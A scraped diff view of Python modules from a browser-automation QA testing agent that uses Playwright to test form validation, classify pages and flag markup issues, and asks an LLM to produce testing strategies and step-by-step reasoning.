                            "Have content reviewed by a native speaker"
                        ]
                    ))
    except Exception as exc:
        logger.error(f"Error checking grammatical errors: {exc}")

    return findings
|
| 729 |
+
|
| 730 |
+
async def intelligent_form_testing(self, page: Page) -> List[TestResult]:
    """Locate every form on the page and run the per-form field tests."""
    findings: List[TestResult] = []
    try:
        for form in await page.query_selector_all('form'):
            findings.extend(await self._test_form_intelligently(form, page))
    except Exception as exc:
        logger.error(f"Error in intelligent form testing: {exc}")
    return findings
|
| 746 |
+
|
| 747 |
+
async def _test_form_intelligently(self, form: Locator, page: Page) -> List[TestResult]:
    """Classify each control in *form* and exercise it with typed test data."""
    findings: List[TestResult] = []
    try:
        for control in await form.query_selector_all('input, textarea, select'):
            # Classify from the control's type/name/id attributes,
            # defaulting each missing attribute as the original did.
            kind = self._determine_field_type(
                await control.get_attribute('type') or 'text',
                await control.get_attribute('name') or 'unknown',
                await control.get_attribute('id') or 'unknown',
            )
            findings.extend(await self._test_field_with_data(control, kind, page))
    except Exception as exc:
        logger.error(f"Error testing form intelligently: {exc}")
    return findings
|
| 772 |
+
|
| 773 |
+
def _determine_field_type(self, input_type: str, input_name: str, input_id: str) -> str:
|
| 774 |
+
"""Determine the field type based on attributes."""
|
| 775 |
+
field_identifier = f"{input_type} {input_name} {input_id}".lower()
|
| 776 |
+
|
| 777 |
+
if 'email' in field_identifier:
|
| 778 |
+
return 'email'
|
| 779 |
+
elif 'password' in field_identifier:
|
| 780 |
+
return 'password'
|
| 781 |
+
elif 'phone' in field_identifier or 'tel' in field_identifier:
|
| 782 |
+
return 'phone'
|
| 783 |
+
elif 'name' in field_identifier and 'first' in field_identifier:
|
| 784 |
+
return 'first_name'
|
| 785 |
+
elif 'name' in field_identifier and 'last' in field_identifier:
|
| 786 |
+
return 'last_name'
|
| 787 |
+
elif 'name' in field_identifier:
|
| 788 |
+
return 'name'
|
| 789 |
+
elif 'url' in field_identifier or 'website' in field_identifier:
|
| 790 |
+
return 'url'
|
| 791 |
+
elif 'date' in field_identifier:
|
| 792 |
+
return 'date'
|
| 793 |
+
elif 'number' in field_identifier or 'age' in field_identifier:
|
| 794 |
+
return 'number'
|
| 795 |
+
elif 'message' in field_identifier or 'comment' in field_identifier:
|
| 796 |
+
return 'message'
|
| 797 |
+
else:
|
| 798 |
+
return 'text'
|
| 799 |
+
|
| 800 |
+
async def _test_field_with_data(self, input_field: Locator, field_type: str, page: Page) -> List[TestResult]:
    """Exercise one form control with valid / invalid / edge-case vectors.

    For each vector the field is filled, Tab is pressed to trigger
    client-side validation, and the page is scanned for an error element.
    Valid data that is rejected → FAILED; invalid data that is accepted →
    FAILED; edge cases that are rejected → WARNING.

    Args:
        input_field: The control under test.
        field_type: Key into ``self.form_test_data`` (unknown keys no-op).
        page: Page hosting the control.

    Returns:
        Findings for validation mismatches.

    Refactor note: the previous revision repeated three near-identical
    ~40-line loops; they are consolidated into one parameterized helper
    (`run_cases`) with identical per-vector behavior and messages.
    """
    results: List[TestResult] = []
    if field_type not in self.form_test_data:
        return results

    test_data = self.form_test_data[field_type]
    # Heuristic selector for a visible validation error (hoisted, invariant).
    error_selector = '.error, .invalid, [class*="error"], [class*="invalid"]'

    async def run_cases(category: str, label: str, expect_error: bool,
                        test_name: str, status: str, desc_prefix: str,
                        desc_verb: str, recommendations: List[str]) -> None:
        """Run every vector of *category*; record a finding when the page's
        validation disagrees with *expect_error*.  Per-vector exceptions are
        logged and skipped, as before."""
        for value in test_data[category]:
            try:
                await input_field.fill(value)
                await page.keyboard.press('Tab')  # blur -> trigger validation
                await page.wait_for_timeout(500)

                error_element = await page.query_selector(error_selector)

                if expect_error and error_element is None:
                    # Bad data sailed through validation.
                    results.append(TestResult(
                        test_type=TestType.FORM_TESTING,
                        test_name=test_name,
                        status=status,
                        description=f"{desc_prefix} {field_type} data {desc_verb}: {value}",
                        details={
                            "field_type": field_type,
                            "test_data": value
                        },
                        recommendations=recommendations
                    ))
                elif not expect_error and error_element is not None:
                    # Acceptable data was rejected.
                    results.append(TestResult(
                        test_type=TestType.FORM_TESTING,
                        test_name=test_name,
                        status=status,
                        description=f"{desc_prefix} {field_type} data {desc_verb}: {value}",
                        details={
                            "field_type": field_type,
                            "test_data": value,
                            "error_message": await error_element.inner_text()
                        },
                        recommendations=recommendations
                    ))
            except Exception as e:
                logger.warning(f"Error testing {label} data: {e}")

    await run_cases(
        'valid', 'valid', expect_error=False,
        test_name="Form Validation - Valid Data Rejected",
        status="FAILED",
        desc_prefix="Valid", desc_verb="rejected",
        recommendations=[
            "Review form validation logic",
            "Ensure valid data is accepted",
            "Test with various valid formats"
        ])
    await run_cases(
        'invalid', 'invalid', expect_error=True,
        test_name="Form Validation - Invalid Data Accepted",
        status="FAILED",
        desc_prefix="Invalid", desc_verb="accepted",
        recommendations=[
            "Implement proper input validation",
            "Reject invalid data formats",
            "Show appropriate error messages"
        ])
    await run_cases(
        'edge_cases', 'edge case', expect_error=False,
        test_name="Form Validation - Edge Case Rejected",
        status="WARNING",
        desc_prefix="Edge case", desc_verb="rejected",
        recommendations=[
            "Consider accepting edge case data",
            "Review validation rules for edge cases",
            "Document expected behavior for edge cases"
        ])

    return results
|
| 897 |
+
|
| 898 |
+
async def ai_thinking_analysis(self, page: Page) -> List[TestResult]:
    """Survey the page and emit INFO findings that steer later test phases.

    Counts forms, links, input controls, and scripts; each non-empty
    category yields one informational finding with suggested follow-ups.
    """
    findings: List[TestResult] = []

    try:
        # Fetched as in the original implementation; the result is unused.
        await page.content()

        # (selector, noun, count key, test type, title, summary, follow-ups)
        surveys = [
            ('form', 'form(s)', 'forms_count',
             TestType.FUNCTIONALITY, "AI Analysis - Forms Detected",
             "Perform comprehensive form testing",
             ["Test all form fields with valid and invalid data",
              "Check form validation and error handling",
              "Test form submission and success scenarios"]),
            ('a[href]', 'link(s)', 'links_count',
             TestType.FUNCTIONALITY, "AI Analysis - Links Detected",
             "Perform link testing",
             ["Check for broken links",
              "Test external link security",
              "Verify link destinations"]),
            ('input, textarea, select', 'input field(s)', 'inputs_count',
             TestType.SECURITY, "AI Analysis - Input Fields Detected",
             "Perform security testing",
             ["Test for SQL injection vulnerabilities",
              "Test for XSS vulnerabilities",
              "Test input validation and sanitization"]),
            ('script', 'script(s)', 'scripts_count',
             TestType.SECURITY, "AI Analysis - JavaScript Detected",
             "Perform JavaScript security testing",
             ["Check for client-side vulnerabilities",
              "Test for DOM-based XSS",
              "Verify JavaScript security practices"]),
        ]

        for selector, noun, count_key, kind, title, summary, follow_ups in surveys:
            elements = await page.query_selector_all(selector)
            if not elements:
                continue
            findings.append(TestResult(
                test_type=kind,
                test_name=title,
                status="INFO",
                description=f"Found {len(elements)} {noun} on the page",
                details={
                    count_key: len(elements),
                    "recommendation": summary
                },
                recommendations=follow_ups
            ))
    except Exception as exc:
        logger.error(f"Error in AI thinking analysis: {exc}")

    return findings
|
| 986 |
+
|
| 987 |
+
async def run_comprehensive_testing(self, page: Page) -> List[TestResult]:
    """Run comprehensive testing with AI thinking.

    Executes every analysis phase against *page* sequentially and
    returns the concatenated results.  The phase order is fixed so the
    report keeps a stable, predictable sequence.
    """
    combined: List[TestResult] = []
    # Phases run one after another; each returns a list of TestResult
    # objects that is appended in order.
    phases = (
        self.ai_thinking_analysis,
        self.perform_security_testing,
        self.check_broken_urls,
        self.check_grammatical_errors,
        self.intelligent_form_testing,
    )
    for phase in phases:
        combined.extend(await phase(page))
    return combined
|
| 1012 |
+
|
| 1013 |
+
|
| 1014 |
+
# Global instance
# Module-level singleton for callers that don't construct their own engine.
advanced_testing_engine = AdvancedTestingEngine()
|
src/utils/ai_thinking_engine.py
ADDED
|
@@ -0,0 +1,437 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - AI Thinking Engine
|
| 3 |
+
==============================================================
|
| 4 |
+
|
| 5 |
+
Advanced AI-powered decision making and adaptive testing intelligence.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import logging
|
| 14 |
+
import json
|
| 15 |
+
from typing import Dict, List, Optional, Any, Tuple
|
| 16 |
+
from dataclasses import dataclass
|
| 17 |
+
from datetime import datetime
|
| 18 |
+
import random
|
| 19 |
+
|
| 20 |
+
from playwright.async_api import Page, Locator
|
| 21 |
+
from langchain_core.language_models.chat_models import BaseChatModel
|
| 22 |
+
from langchain_core.messages import HumanMessage, SystemMessage
|
| 23 |
+
|
| 24 |
+
logger = logging.getLogger(__name__)
|
| 25 |
+
|
| 26 |
+
@dataclass
class ThinkingStep:
    """Represents a step in the AI thinking process.

    One entry of the engine's ``thinking_history``; instances are built
    from the LLM's JSON reply in ``think_through_scenario``.
    """
    step_number: int      # 1-based position within the scenario walk-through
    thought: str          # what is being considered at this step
    action: str           # the concrete action proposed
    reasoning: str        # why that action was chosen
    confidence: float     # self-reported confidence, 0.0 to 1.0
    timestamp: datetime   # when the step was recorded
|
| 35 |
+
|
| 36 |
+
@dataclass
class TestStrategy:
    """Represents a testing strategy determined by AI."""
    approach: str                      # overall approach, e.g. "comprehensive"
    priority_order: List[str]          # testing priorities, highest first
    focus_areas: List[str]             # specific areas to concentrate on
    # Risk level per area; the built-in fallback uses floats in 0.0-1.0,
    # the LLM is asked for high/medium/low — callers should accept either.
    risk_assessment: Dict[str, float]
    estimated_duration: int  # minutes
    reasoning: str                     # explanation of why this strategy was chosen
|
| 45 |
+
|
| 46 |
+
class AIThinkingEngine:
|
| 47 |
+
"""Advanced AI thinking engine for intelligent testing decisions."""
|
| 48 |
+
|
| 49 |
+
def __init__(self, llm: BaseChatModel, page: Page):
    """Bind the engine to a chat model and the Playwright page under test."""
    self.llm = llm    # chat model used for strategy/scenario reasoning
    self.page = page  # Playwright page the analyses run against
    # Every ThinkingStep produced by think_through_scenario, in order.
    self.thinking_history: List[ThinkingStep] = []
    # Scratch memory shared across calls (learned patterns, timestamps, ...).
    self.context_memory: Dict[str, Any] = {}
    # Per-scenario-type outcome history populated by learn_from_results.
    self.learning_patterns: Dict[str, List[Any]] = {}
|
| 55 |
+
|
| 56 |
+
async def analyze_page_intelligence(self) -> Dict[str, Any]:
    """Perform intelligent analysis of the current page.

    Runs each probe sequentially and returns their results keyed by
    analysis name.
    """
    logger.info("🧠 Starting intelligent page analysis...")

    # Probes run in this exact order; each awaits the page in turn.
    probes = (
        ("page_type", self._determine_page_type),
        ("form_complexity", self._assess_form_complexity),
        ("security_indicators", self._detect_security_indicators),
        ("user_flow_analysis", self._analyze_user_flow),
        ("potential_issues", self._identify_potential_issues),
        ("testing_opportunities", self._identify_testing_opportunities),
    )
    analysis: Dict[str, Any] = {}
    for key, probe in probes:
        analysis[key] = await probe()

    logger.info(f"✅ Page analysis complete: {analysis['page_type']} page with {analysis['form_complexity']} complexity")
    return analysis
|
| 71 |
+
|
| 72 |
+
async def _determine_page_type(self) -> str:
    """Classify the current page (login, registration, checkout, ...).

    Keyword checks run in a fixed order, so a page matching several
    categories gets the first matching label.  Returns "general" when
    nothing matches and "unknown" on error.
    """
    # Ordered (keywords, label) table; first hit wins.
    classifiers = (
        (("login", "sign in", "log in", "authenticate"), "login"),
        (("register", "sign up", "create account", "join"), "registration"),
        (("checkout", "payment", "billing", "purchase"), "checkout"),
        (("contact", "message", "inquiry", "support"), "contact"),
        (("search", "find", "look for"), "search"),
        (("profile", "account", "settings", "preferences"), "profile"),
    )
    try:
        haystack = (await self.page.content()).lower()
        for keywords, label in classifiers:
            if any(word in haystack for word in keywords):
                return label
        return "general"
    except Exception as e:
        logger.error(f"Error determining page type: {e}")
        return "unknown"
|
| 97 |
+
|
| 98 |
+
async def _assess_form_complexity(self) -> str:
    """Bucket the page into none/simple/moderate/complex/very_complex
    based on how many input, textarea and select elements it has."""
    try:
        # NOTE(review): the form count is queried but does not affect the
        # result — only the individual field total does.
        form_count = await self.page.locator("form").count()
        field_total = sum([
            await self.page.locator("input").count(),
            await self.page.locator("textarea").count(),
            await self.page.locator("select").count(),
        ])

        # Inclusive upper bounds, checked smallest first.
        for upper_bound, label in ((0, "none"), (3, "simple"), (7, "moderate"), (15, "complex")):
            if field_total <= upper_bound:
                return label
        return "very_complex"

    except Exception as e:
        logger.error(f"Error assessing form complexity: {e}")
        return "unknown"
|
| 122 |
+
|
| 123 |
+
async def _detect_security_indicators(self) -> List[str]:
    """Collect markers of security mechanisms visible on the page."""
    found: List[str] = []

    try:
        html = await self.page.content()
        lowered = html.lower()

        # 'data-security' is matched case-sensitively against the raw HTML.
        if 'data-security' in html:
            found.append("custom_security_attributes")

        # Each token is checked independently, so e.g. "recaptcha" in the
        # page reports both the captcha and recaptcha indicators.
        for token, label in (
            ('csrf', "csrf_protection"),
            ('captcha', "captcha_protection"),
            ('recaptcha', "recaptcha_protection"),
        ):
            if token in lowered:
                found.append(label)

        if self.page.url.startswith('https://'):
            found.append("https_enabled")

        # Baseline marker — response headers are not inspected here.
        found.append("basic_web_security")

    except Exception as e:
        logger.error(f"Error detecting security indicators: {e}")

    return found
|
| 154 |
+
|
| 155 |
+
async def _analyze_user_flow(self) -> Dict[str, Any]:
    """Summarise the navigation and interaction affordances on the page."""
    try:
        nav_count = await self.page.locator("nav a, .navigation a, .menu a").count()
        button_count = await self.page.locator("button").count()
        form_count = await self.page.locator("form").count()
        submit_count = await self.page.locator("input[type='submit'], button[type='submit']").count()

        # Complexity buckets driven by navigation links and form count only.
        if nav_count > 10 or form_count > 3:
            journey = "high"
        elif nav_count > 5 or form_count > 1:
            journey = "medium"
        else:
            journey = "low"

        return {
            "navigation_links": nav_count,
            "interactive_buttons": button_count,
            "forms": form_count,
            "submit_buttons": submit_count,
            "user_journey_complexity": journey,
        }

    except Exception as e:
        logger.error(f"Error analyzing user flow: {e}")
        return {"error": str(e)}
|
| 177 |
+
|
| 178 |
+
async def _identify_potential_issues(self) -> List[str]:
    """Flag common markup smells that hint at bugs or vulnerabilities."""
    flagged: List[str] = []

    try:
        html = await self.page.content()
        lowered = html.lower()

        # The mix of lowered and raw content is intentional: attribute
        # values like type="password" are matched case-sensitively,
        # keywords are not.
        if 'password' in lowered and 'type="password"' not in html:
            flagged.append("password_field_not_secured")

        if 'email' in lowered and 'type="email"' not in html:
            flagged.append("email_field_not_typed")

        if 'required' not in html and 'form' in lowered:
            flagged.append("missing_required_validation")

        if 'onclick' in lowered:
            flagged.append("inline_javascript_detected")

        if 'http://' in html and 'https://' in html:
            flagged.append("mixed_content_detected")

    except Exception as e:
        logger.error(f"Error identifying potential issues: {e}")

    return flagged
|
| 205 |
+
|
| 206 |
+
async def _identify_testing_opportunities(self) -> List[str]:
    """Identify specific testing opportunities on the current page.

    Returns opportunity tags (e.g. ``"email_validation_testing"``)
    derived from the input types, forms and data-* attributes present.
    Returns whatever was gathered before the first error, on error.
    """
    opportunities: List[str] = []

    try:
        # Collect the distinct input types present on the page.
        input_types = await self.page.locator("input[type]").all()
        type_set = set()

        for input_elem in input_types:
            input_type = await input_elem.get_attribute("type")
            if input_type:
                type_set.add(input_type)

        # Map each interesting input type to the testing it suggests.
        for input_type, opportunity in (
            ("email", "email_validation_testing"),
            ("password", "password_security_testing"),
            ("number", "numeric_input_testing"),
            ("date", "date_validation_testing"),
            ("file", "file_upload_testing"),
        ):
            if input_type in type_set:
                opportunities.append(opportunity)

        # Forms enable submission and cross-field validation testing.
        if await self.page.locator("form").count() > 0:
            opportunities.append("form_submission_testing")
            opportunities.append("cross_field_validation_testing")

        # Check for dynamic content.  BUGFIX: "[data-*]" is not a valid CSS
        # selector (attribute names cannot be wildcarded), so locator() used
        # to raise here and abort the check.  Probe for data-* attributes
        # with a small JS expression instead.
        has_data_attributes = await self.page.evaluate(
            "() => Array.from(document.querySelectorAll('*'))"
            ".some(el => Array.from(el.attributes)"
            ".some(attr => attr.name.startsWith('data-')))"
        )
        if has_data_attributes:
            opportunities.append("dynamic_content_testing")

    except Exception as e:
        logger.error(f"Error identifying testing opportunities: {e}")

    return opportunities
|
| 248 |
+
|
| 249 |
+
async def generate_testing_strategy(self, page_analysis: Dict[str, Any]) -> TestStrategy:
    """Generate an intelligent testing strategy based on page analysis.

    Sends the page-analysis summary to the LLM and parses its JSON reply
    into a TestStrategy.  Falls back to a fixed comprehensive strategy if
    the LLM call or JSON parsing fails.
    """
    logger.info("🎯 Generating intelligent testing strategy...")

    # Use AI to determine the best testing approach
    strategy_prompt = f"""
    Based on the following page analysis, generate a comprehensive testing strategy:

    Page Type: {page_analysis.get('page_type', 'unknown')}
    Form Complexity: {page_analysis.get('form_complexity', 'unknown')}
    Security Indicators: {page_analysis.get('security_indicators', [])}
    Potential Issues: {page_analysis.get('potential_issues', [])}
    Testing Opportunities: {page_analysis.get('testing_opportunities', [])}

    Please provide a JSON response with:
    1. approach: The overall testing approach (comprehensive, focused, security-focused, etc.)
    2. priority_order: List of testing priorities in order
    3. focus_areas: Specific areas to focus testing on
    4. risk_assessment: Risk levels for different areas (high, medium, low)
    5. estimated_duration: Estimated testing duration in minutes
    6. reasoning: Explanation of the strategy

    Focus on:
    - Form validation testing (valid, invalid, edge cases)
    - Security testing (SQL injection, XSS, CSRF)
    - User experience testing
    - Cross-browser compatibility
    - Performance testing
    """

    try:
        messages = [
            SystemMessage(content="You are an expert QA engineer specializing in web application testing. Provide detailed, actionable testing strategies."),
            HumanMessage(content=strategy_prompt)
        ]

        response = await self.llm.ainvoke(messages)

        # ROBUSTNESS FIX: LLMs frequently wrap JSON in markdown fences or
        # surrounding prose; extract the outermost object before parsing
        # instead of failing straight into the fallback.
        raw = response.content
        start, end = raw.find("{"), raw.rfind("}")
        if start != -1 and end > start:
            raw = raw[start:end + 1]
        strategy_data = json.loads(raw)

        strategy = TestStrategy(
            approach=strategy_data.get("approach", "comprehensive"),
            priority_order=strategy_data.get("priority_order", []),
            focus_areas=strategy_data.get("focus_areas", []),
            risk_assessment=strategy_data.get("risk_assessment", {}),
            estimated_duration=strategy_data.get("estimated_duration", 30),
            reasoning=strategy_data.get("reasoning", "AI-generated strategy")
        )

        logger.info(f"✅ Testing strategy generated: {strategy.approach} approach")
        return strategy

    except Exception as e:
        logger.error(f"Error generating testing strategy: {e}")
        # Fallback strategy
        return TestStrategy(
            approach="comprehensive",
            priority_order=["form_validation", "security_testing", "user_experience"],
            focus_areas=["input_validation", "authentication", "data_integrity"],
            risk_assessment={"security": 0.8, "validation": 0.6, "ux": 0.4},
            estimated_duration=30,
            reasoning="Fallback strategy due to AI error"
        )
|
| 311 |
+
|
| 312 |
+
async def think_through_scenario(self, scenario: str, context: Dict[str, Any]) -> List[ThinkingStep]:
    """Think through a specific testing scenario step by step.

    Asks the LLM for a JSON array of reasoning steps, converts them to
    ThinkingStep objects, appends them to ``thinking_history`` and
    returns them.  Returns an empty list on any failure.
    """
    logger.info(f"🤔 Thinking through scenario: {scenario}")

    thinking_prompt = f"""
    As an expert QA engineer, think through this testing scenario step by step:

    Scenario: {scenario}
    Context: {json.dumps(context, indent=2)}

    Provide your thinking process as a JSON array of steps, where each step has:
    - step_number: Sequential number
    - thought: What you're thinking about
    - action: What action you would take
    - reasoning: Why you would take this action
    - confidence: Confidence level (0.0 to 1.0)

    Consider:
    1. What could go wrong?
    2. What edge cases should be tested?
    3. What security implications exist?
    4. How can we ensure comprehensive coverage?
    5. What are the user experience implications?
    """

    try:
        messages = [
            SystemMessage(content="You are an expert QA engineer. Think through testing scenarios systematically and provide detailed reasoning."),
            HumanMessage(content=thinking_prompt)
        ]

        response = await self.llm.ainvoke(messages)

        # ROBUSTNESS FIX: tolerate markdown fences / prose around the JSON
        # array by extracting the outermost [...] before parsing.
        raw = response.content
        start, end = raw.find("["), raw.rfind("]")
        if start != -1 and end > start:
            raw = raw[start:end + 1]
        thinking_data = json.loads(raw)

        thinking_steps = []
        # Renumber steps locally rather than trusting the LLM's numbering.
        for i, step_data in enumerate(thinking_data, 1):
            step = ThinkingStep(
                step_number=i,
                thought=step_data.get("thought", ""),
                action=step_data.get("action", ""),
                reasoning=step_data.get("reasoning", ""),
                confidence=step_data.get("confidence", 0.5),
                timestamp=datetime.now()
            )
            thinking_steps.append(step)

        self.thinking_history.extend(thinking_steps)
        logger.info(f"✅ Generated {len(thinking_steps)} thinking steps")
        return thinking_steps

    except Exception as e:
        logger.error(f"Error thinking through scenario: {e}")
        return []
|
| 365 |
+
|
| 366 |
+
async def adapt_testing_approach(self, previous_results: List[Dict[str, Any]]) -> Dict[str, Any]:
    """Adapt the testing approach based on previous results."""
    logger.info("🔄 Adapting testing approach based on previous results...")

    if not previous_results:
        return {"adaptation": "no_previous_data", "recommendations": []}

    # A result with no "success" key counts as a success.
    failed = [result for result in previous_results if not result.get("success", True)]
    rate = (len(previous_results) - len(failed)) / len(previous_results)

    plan: Dict[str, Any] = {
        "success_rate": rate,
        "adaptations": [],
        "recommendations": []
    }

    if rate < 0.5:
        plan["adaptations"].append("increase_test_coverage")
        plan["recommendations"].append("Focus on high-priority test cases first")

    # Failures whose scenario names point at validation problems.
    if any("validation" in result.get("scenario_name", "").lower() for result in failed):
        plan["adaptations"].append("enhance_validation_testing")
        plan["recommendations"].append("Implement more robust validation testing")

    # Failures whose scenario names point at security testing.
    if any(
        marker in result.get("scenario_name", "").lower()
        for result in failed
        for marker in ("sql", "xss", "injection")
    ):
        plan["adaptations"].append("strengthen_security_testing")
        plan["recommendations"].append("Focus on security vulnerability testing")

    logger.info(f"✅ Testing approach adapted: {len(plan['adaptations'])} adaptations")
    return plan
|
| 400 |
+
|
| 401 |
+
async def learn_from_results(self, test_results: List[Dict[str, Any]]) -> None:
    """Learn from test results to improve future testing."""
    logger.info("📚 Learning from test results...")

    for result in test_results:
        # Scenario names look like "<type> - <detail>"; bucket by type.
        bucket = result.get("scenario_name", "").split(" - ")[0]
        self.learning_patterns.setdefault(bucket, []).append({
            "success": result.get("success", False),
            "actual_result": result.get("actual_result", ""),
            "timestamp": datetime.now().isoformat()
        })

    # Mirror the learned patterns into the shared context memory.
    self.context_memory["learning_patterns"] = self.learning_patterns
    self.context_memory["last_learning_update"] = datetime.now().isoformat()

    logger.info(f"✅ Learned from {len(test_results)} test results")
|
| 422 |
+
|
| 423 |
+
def get_thinking_summary(self) -> Dict[str, Any]:
|
| 424 |
+
"""Get a summary of the AI thinking process."""
|
| 425 |
+
if not self.thinking_history:
|
| 426 |
+
return {"message": "No thinking history available"}
|
| 427 |
+
|
| 428 |
+
total_steps = len(self.thinking_history)
|
| 429 |
+
avg_confidence = sum(step.confidence for step in self.thinking_history) / total_steps
|
| 430 |
+
|
| 431 |
+
return {
|
| 432 |
+
"total_thinking_steps": total_steps,
|
| 433 |
+
"average_confidence": round(avg_confidence, 2),
|
| 434 |
+
"thinking_areas": list(set(step.action.split()[0] for step in self.thinking_history if step.action)),
|
| 435 |
+
"learning_patterns": len(self.learning_patterns),
|
| 436 |
+
"context_memory_size": len(self.context_memory)
|
| 437 |
+
}
|
src/utils/config.py
ADDED
|
@@ -0,0 +1,111 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
